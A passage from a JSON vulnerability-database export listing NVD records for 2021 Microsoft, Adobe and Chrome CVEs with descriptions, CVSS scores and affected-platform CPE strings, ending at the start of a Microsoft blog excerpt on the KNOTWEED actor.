"cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T14:21:10", "description": "Microsoft Defender Remote Code Execution Vulnerability", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-08T23:15:00", "type": "cve", "title": "CVE-2021-31985", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31985"], "modified": "2022-05-27T14:04:00", "cpe": [], "id": "CVE-2021-31985", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-31985", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2023-02-09T14:21:06", "description": "Windows Remote Desktop Services\u00c2 Denial of Service Vulnerability", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-06-08T23:15:00", "type": "cve", "title": "CVE-2021-31968", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31968"], "modified": "2021-06-11T16:52:00", "cpe": ["cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_server_2008:sp2", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2008:r2"], "id": "CVE-2021-31968", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-31968", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:sp2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T14:23:07", "description": "Microsoft DWM Core Library Elevation of Privilege Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-08T23:15:00", "type": "cve", "title": "CVE-2021-33739", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33739"], "modified": "2022-05-03T16:04:00", "cpe": ["cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2016:20h2"], "id": "CVE-2021-33739", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-33739", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T14:16:36", "description": "Acrobat Reader DC versions versions 2021.001.20150 (and earlier), 2020.001.30020 (and earlier) and 2017.011.30194 (and earlier) are affected by a Use After Free vulnerability. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-02T17:15:00", "type": "cve", "title": "CVE-2021-28550", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28550"], "modified": "2021-09-15T13:55:00", "cpe": ["cpe:/a:adobe:acrobat:17.011.30194", "cpe:/a:adobe:acrobat_reader_dc:21.001.20150", "cpe:/a:adobe:acrobat:20.001.30020", "cpe:/a:adobe:acrobat_dc:21.001.20150", "cpe:/a:adobe:acrobat_reader:20.001.30020", "cpe:/a:adobe:acrobat_reader:17.011.30194"], "id": "CVE-2021-28550", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-28550", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:adobe:acrobat_reader:17.011.30194:*:*:*:classic:*:*:*", "cpe:2.3:a:adobe:acrobat:17.011.30194:*:*:*:classic:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:20.001.30020:*:*:*:classic:*:*:*", "cpe:2.3:a:adobe:acrobat_dc:21.001.20150:*:*:*:continuous:*:*:*", "cpe:2.3:a:adobe:acrobat_reader_dc:21.001.20150:*:*:*:continuous:*:*:*", "cpe:2.3:a:adobe:acrobat:20.001.30020:*:*:*:classic:*:*:*"]}, {"lastseen": "2023-02-09T14:21:05", "description": "Windows Kernel Information Disclosure Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-06-08T23:15:00", "type": "cve", "title": "CVE-2021-31955", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31955"], "modified": "2021-06-10T18:04:00", "cpe": ["cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2019:-"], "id": "CVE-2021-31955", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-31955", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T14:06:15", "description": "Type confusion in V8 in Google Chrome prior to 90.0.4430.85 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-04-26T17:15:00", "type": "cve", "title": "CVE-2021-21224", "cwe": ["CWE-843"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21224"], "modified": "2021-06-01T15:22:00", "cpe": ["cpe:/o:fedoraproject:fedora:32", "cpe:/o:fedoraproject:fedora:33", "cpe:/o:debian:debian_linux:10.0", "cpe:/o:fedoraproject:fedora:34"], "id": "CVE-2021-21224", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21224", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T14:21:06", "description": "Windows NTFS Elevation of Privilege Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-08T23:15:00", "type": "cve", "title": "CVE-2021-31956", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31956"], "modified": "2022-05-03T16:04:00", "cpe": ["cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_server_2008:sp2", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2008:r2"], "id": "CVE-2021-31956", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-31956", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:sp2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T14:23:07", "description": "Windows MSHTML Platform Remote Code Execution Vulnerability", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-08T23:15:00", "type": "cve", "title": "CVE-2021-33742", "cwe": ["CWE-681"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33742"], "modified": "2022-07-12T17:42:00", "cpe": ["cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_server_2008:sp2", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2016:-"], "id": "CVE-2021-33742", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-33742", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:sp2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T14:14:08", "description": "Microsoft SharePoint Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-31963, CVE-2021-31966.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-08T23:15:00", "type": "cve", "title": "CVE-2021-26420", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26420", "CVE-2021-31963", "CVE-2021-31966"], "modified": "2021-09-13T18:54:00", "cpe": ["cpe:/a:microsoft:sharepoint_server:2019", "cpe:/a:microsoft:sharepoint_enterprise_server:2016", "cpe:/a:microsoft:sharepoint_foundation:2013"], "id": "CVE-2021-26420", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-26420", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:microsoft:sharepoint_server:2019:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:sharepoint_enterprise_server:2016:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:sharepoint_foundation:2013:sp1:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T14:21:06", "description": "Microsoft SharePoint Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26420, CVE-2021-31966.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-08T23:15:00", "type": "cve", "title": "CVE-2021-31963", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26420", "CVE-2021-31963", "CVE-2021-31966"], "modified": "2021-06-15T13:13:00", "cpe": ["cpe:/a:microsoft:sharepoint_server:2019", "cpe:/a:microsoft:sharepoint_server:2016", "cpe:/a:microsoft:sharepoint_server:2013", "cpe:/a:microsoft:sharepoint_foundation:2013"], "id": "CVE-2021-31963", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-31963", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:microsoft:sharepoint_server:2016:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:sharepoint_server:2013:sp1:*:*:enterprise:*:*:*", "cpe:2.3:a:microsoft:sharepoint_foundation:2013:sp1:*:*:*:*:*:*", "cpe:2.3:a:microsoft:sharepoint_server:2019:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T14:21:06", "description": "Microsoft SharePoint Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26420, CVE-2021-31963.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-08T23:15:00", "type": "cve", "title": "CVE-2021-31966", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26420", "CVE-2021-31963", "CVE-2021-31966"], "modified": "2021-06-14T21:02:00", "cpe": ["cpe:/a:microsoft:sharepoint_server:2019", "cpe:/a:microsoft:sharepoint_server:2016", "cpe:/a:microsoft:sharepoint_server:2013", "cpe:/a:microsoft:sharepoint_foundation:2013"], "id": "CVE-2021-31966", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-31966", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:microsoft:sharepoint_server:2016:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:sharepoint_server:2013:sp1:*:*:enterprise:*:*:*", "cpe:2.3:a:microsoft:sharepoint_foundation:2013:sp1:*:*:*:*:*:*", "cpe:2.3:a:microsoft:sharepoint_server:2019:*:*:*:*:*:*:*"]}], "mmpc": [{"lastseen": "2022-07-27T17:42:56", "description": "The Microsoft Threat Intelligence Center (MSTIC) and the Microsoft Security Response Center (MSRC) found a private-sector offensive actor (PSOA) using multiple Windows and Adobe 0-day exploits, including one for the recently patched [CVE-2022-22047](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22047>), in limited and targeted attacks against European and Central American customers. The PSOA, which MSTIC tracks as KNOTWEED, developed malware called Subzero which was used in these attacks.\n\nThis blog details 